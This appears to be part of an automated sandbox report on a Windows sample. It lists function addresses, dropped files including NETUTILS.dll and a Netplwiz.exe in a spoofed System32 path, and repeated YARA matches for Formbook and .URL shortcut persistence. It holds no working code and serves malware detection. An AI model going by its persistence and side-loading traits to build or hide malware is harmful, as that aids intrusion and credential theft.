        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00408C50
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_0041B4A3
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00402D90
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_0041CEBD
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00402FB0
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AC20A0
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B620A8
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AAB090
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B628EC
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B6E824
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00ABA830
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00A96800
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B51002
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AB99BF
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AB4120
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00A9F900
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B622AE
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B632A9
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B54AEF
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B5E2C5
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00ABB236
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B4FA2B
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00ACEBB0
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AC138B
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00ABEB9A
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B3EB8A
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AE8BE8
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B423E3
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B5DBD2
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B503DA
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00ACABD8
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B62B28
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00ABA309
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B5231B
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00ABAB40
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B3CB4F
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B54496
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AA841F
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B5D466
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00ABB477
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AC65A0
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AC2581
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B52D82
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AAD5E0
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B625DD
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00A90D20
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B62D07
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B61D55
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B41EB6
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B62EF7
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AB6E30
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B5D616
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00AB5600
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B61FF1
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B567E2
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: 3_2_00B6DFCE
        Source: C:\Windows \System32\Netplwiz.exe, Code function: 8_2_00007FF61AD32D20
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 13_2_00007FFA35A81678
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 13_2_00007FFA35A843DC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 13_2_00007FFA35A81700
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 13_2_00007FFA35B57962
        Source: Joe Sandbox View, Dropped File: C:\Users\Public\NETUTILS.dll 36D1FA474CD8271F9B74B9481025614B6FF309F767F69D9F1FF3960C7205AD12
        Source: C:\Users\Public\Citvon\Citvon.exe, Code function: String function: 02208190 appears 45 times
        Source: C:\Users\Public\Citvon\Citvon.exe, Code function: String function: 0220A097 appears 42 times
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: String function: 00B25720 appears 38 times
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: String function: 00AED08C appears 39 times
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: String function: 0041A0A0 appears 31 times
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Code function: String function: 00A9B150 appears 154 times
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Static PE information: invalid certificate
        Source: NETUTILS.dll.6.dr, Static PE information: Number of sections : 19 > 10
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
        Source: Citvon.exe.0.dr, Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
        Source: Netplwiz.exe.0.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Netplwiz.exe.0.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Netplwiz.exe.0.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Netplwiz.exe.6.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Netplwiz.exe.6.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Netplwiz.exe.6.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, 00000003.00000002.698168920.0000000000B8F000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Section loaded: nviewlib.dll
        Source: C:\Users\Public\Citvon\Citvon.exe, Section loaded: nviewlib.dll
        Source: C:\Users\Public\Citvon\Citvon.exe, Section loaded: nviewlib.dll
        Source: C:\Windows\SysWOW64\msiexec.exe, Section loaded: sfc.dll
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
        Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.681744195.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.794009092.0000000003CD4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776445202.0000000003BD4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680695317.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.777072659.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793842362.0000000003CD4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792672644.0000000003DA4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775505378.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776207302.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 0000001A.00000000.833193136.000000000A6D7000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.791925004.0000000003DA4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.777194566.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775598772.0000000003BD4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.680995557.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793060027.0000000003DA4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793181479.0000000003CD4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680590350.0000000003BD4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680350085.0000000003BD4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776689752.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775112888.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.794640996.0000000003CD4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776879141.0000000003BD4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.681371824.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681401941.0000000003BD4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680945161.0000000003BD4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681291309.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776094630.0000000003BD4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.774258125.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775315084.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680731974.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.681518622.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775824853.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681644403.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680558315.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680395573.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681105272.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.680649667.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000014.00000003.794191369.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792747836.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.777314398.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793593765.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775903098.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.680465750.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.680834429.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
